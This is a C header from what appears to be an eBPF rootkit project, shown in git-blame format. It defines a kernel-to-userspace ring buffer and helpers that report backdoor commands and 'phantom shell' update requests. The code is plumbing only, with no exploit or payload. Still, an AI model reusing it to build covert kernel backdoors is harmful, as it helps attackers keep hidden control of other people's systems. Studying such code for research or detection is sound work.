2021-12-30 12:48:45 -05:00
|
|
|
#ifndef __RING_BUFFER_H
|
|
|
|
|
#define __RING_BUFFER_H
|
|
|
|
|
|
2022-01-06 13:31:52 -05:00
|
|
|
/*#include <linux/bpf.h>
|
|
|
|
|
#include <bpf/bpf_helpers.h>*/
|
2022-05-10 19:09:52 -04:00
|
|
|
#ifndef __H_TCKIT
|
2022-01-14 21:18:51 -05:00
|
|
|
#include "headervmlinux.h"
|
2022-05-10 19:09:52 -04:00
|
|
|
#endif
|
2022-01-06 13:31:52 -05:00
|
|
|
|
2021-12-30 12:48:45 -05:00
|
|
|
#include <bpf/bpf_tracing.h>
|
|
|
|
|
#include <bpf/bpf_core_read.h>
|
|
|
|
|
|
2022-01-14 21:18:51 -05:00
|
|
|
#include "../../../common/map_common.h"
|
2021-12-30 12:48:45 -05:00
|
|
|
|
|
|
|
|
#define RING_BUFFER_MAX_ELEMS 256
|
|
|
|
|
|
|
|
|
|
/**
|
|
|
|
|
* @brief Ring buffer for general communication kernel->userspace
|
|
|
|
|
*
|
|
|
|
|
*/
|
|
|
|
|
struct ring_buffer {
|
|
|
|
|
__uint(type, BPF_MAP_TYPE_RINGBUF);
|
|
|
|
|
__uint(max_entries, RING_BUFFER_MAX_ELEMS * 1024); //Multiple struct rb_event(s) must fit here
|
|
|
|
|
};
|
|
|
|
|
struct ring_buffer rb_comm SEC(".maps");
|
|
|
|
|
|
|
|
|
|
/**
|
|
|
|
|
* @brief Sends an event into the specified ring kernel buffer
|
|
|
|
|
*
|
|
|
|
|
* @return 0 if ok, -1 if error
|
|
|
|
|
*/
|
2021-12-30 21:09:26 -05:00
|
|
|
static __always_inline int ring_buffer_send(struct ring_buffer *rb, int pid, event_type_t event_type, int code, char* message, __u32 message_len){
|
2021-12-30 12:48:45 -05:00
|
|
|
struct rb_event *event = (struct rb_event*) bpf_ringbuf_reserve(rb, sizeof(struct rb_event), 0);
|
|
|
|
|
if(!event){
|
|
|
|
|
return -1;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
event->code = code;
|
|
|
|
|
event->event_type = event_type;
|
|
|
|
|
event->pid = pid;
|
2021-12-30 21:09:26 -05:00
|
|
|
bpf_probe_read_kernel_str(&event->message, message_len, message);
|
2021-12-30 12:48:45 -05:00
|
|
|
|
|
|
|
|
bpf_ringbuf_submit(event, 0);
|
|
|
|
|
return 0;
|
|
|
|
|
}
|
2022-05-05 13:22:47 -04:00
|
|
|
|
|
|
|
|
/**
|
|
|
|
|
* @brief Sends an event indicating a received command in the backdoor
|
|
|
|
|
*
|
|
|
|
|
* @return 0 if ok, -1 if error
|
|
|
|
|
*/
|
|
|
|
|
static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer *rb, int pid, int code){
|
|
|
|
|
struct rb_event *event = (struct rb_event*) bpf_ringbuf_reserve(rb, sizeof(struct rb_event), 0);
|
|
|
|
|
if(!event){
|
|
|
|
|
return -1;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
event->code = code;
|
|
|
|
|
event->event_type = COMMAND;
|
|
|
|
|
event->pid = pid;
|
|
|
|
|
|
|
|
|
|
bpf_ringbuf_submit(event, 0);
|
|
|
|
|
return 0;
|
|
|
|
|
}
|
2022-05-10 23:04:19 -04:00
|
|
|
|
|
|
|
|
/**
|
|
|
|
|
* @brief Sends an event indicating a received command in the backdoor
|
|
|
|
|
*
|
|
|
|
|
* @return 0 if ok, -1 if error
|
|
|
|
|
*/
|
|
|
|
|
static __always_inline int ring_buffer_send_request_update_phantom_shell(struct ring_buffer *rb, int pid, int code, struct backdoor_phantom_shell_data data){
|
|
|
|
|
struct rb_event *event = (struct rb_event*) bpf_ringbuf_reserve(rb, sizeof(struct rb_event), 0);
|
|
|
|
|
if(!event){
|
|
|
|
|
return -1;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
event->code = code;
|
|
|
|
|
event->event_type = PSH_UPDATE;
|
|
|
|
|
event->pid = pid;
|
|
|
|
|
event->bps_data = data;
|
|
|
|
|
|
|
|
|
|
bpf_ringbuf_submit(event, 0);
|
|
|
|
|
return 0;
|
|
|
|
|
}
|
2021-12-30 12:48:45 -05:00
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#endif
|
